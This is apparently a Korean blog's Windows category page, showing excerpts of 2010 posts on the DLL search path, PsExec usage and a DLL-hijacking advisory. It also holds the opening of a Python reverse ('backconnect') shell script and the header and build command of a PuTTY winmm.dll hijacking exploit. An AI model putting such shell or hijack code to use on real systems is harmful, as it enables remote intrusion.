본문 바로가기

윈도우445

윈도우 환경 Python 쉘 리바운드 #!/usr/bin/python import socket import sys import os def usage(): print "Simple Python Backconnect Shell" print "Usage:" print "./bc.py [ip] [port]" quit() #Initialize socket s = socket.socket() #Check if required arguments have been filled try: ip = sys.argv[1] port = int(sys.argv[2]) except: usage() #Connect to given target IP & port try: s.connect((ip, port)) except: print "Connection Failed!.. 2010. 9. 10.
DLL 검색 경로 알고리즘 제어 (CWDIllegalInDllSearch) CWDIllegalInDllSearch 레지스트리 키 작동 방식 응용 프로그램이 정규화된 경로를 지정하지 않은 상태로 DLL을 동적으로 로드하면 Windows는 잘 정의된 디렉터리 집합을 검색하여 이 DLL을 찾으려고 합니다. 이러한 디렉터리 집합을 DLL 검색 경로라고 합니다. Windows는 디렉터리에서 DLL을 찾는 즉시 해당 DLL을 로드합니다. Windows는 DLL 검색 순서의 어떤 디렉터리에서도 해당 DLL을 찾지 못하면 DLL 로드 작업 실패 결과를 반환합니다. LoadLibrary 함수 및 LoadLibraryEx 함수는 DLL을 동적으로 로드하는 데 사용됩니다. 다음은 이러한 두 함수의 DLL 검색 순서입니다. 응용 프로그램이 로드되는 디렉터리 시스템 디렉터리 16비트 시스템 디렉터리 .. 2010. 9. 1.
PsExec, RunAs Tools PsExec (part of PsTools - download PsExec) Execute a command-line process on a remote machine. Syntax psexec \\computer[,computer[,..] [options] command [arguments] psexec @run_file [options] command [arguments] Options: computer The computer on which psexec will run command. Default = local system To run against all computers in the current domain enter "\\*" @run_file Run command on every comp.. 2010. 8. 28.
PuTTY DLL Hijacking Exploit (winmm.dll) /* Exploit Title: PuTTY DLL Hijacking Exploit (winmm.dll) Date: August 25, 2010 Author: storm (storm@gonullyourself.org) Version: 0.60 Tested on: Windows Vista SP2 http://www.gonullyourself.org/ gcc -shared -o winmm.dll PuTTY-DLL.c -DWIN32_LEAN_AND_MEAN PuTTY is a standalone program, so just plop the .dll in whatever directory the binary is in. */ #include #define DllExport __declspec (dllexport.. 2010. 8. 26.
DLL 하이재킹 취약점으로 인한 악성코드 감염 주의 □ 개요 o 일부 응용프로그램에서 로드하는 라이브러리 파일의 경로를 부적절하게 검증함으로 인해 원격코드실행 취약점이 발생 [1, 3, 4, 5, 10] o 공격자는 취약한 프로그램을 사용하는 파일을 USB 이동저장매체, 압축 해제된 파일, WebDav, 원격 네트워크 공유 등을 통해 열도록 유도하여, 동일한 경로의 악의적인 라이브러리 파일이 로드되어 실행되게 함으로써 악성코드를 유포할 수 있음 [1, 6, 7] o 취약점을 공격하는 개념증명코드가 공개되었고 다수의 응용프로그램이 취약할 것으로 추정[2, 5]되므로, 개발자의 취약점 점검 조치 및 사용자의 각별한 주의가 요구됨 □ 해당 시스템 o 영향 받는 소프트웨어 [1, 5] - 외부 라이브러리를 안전하지 않은 방식으로 로드하는 응용프로그램 ※ Load.. 2010. 8. 26.
728x90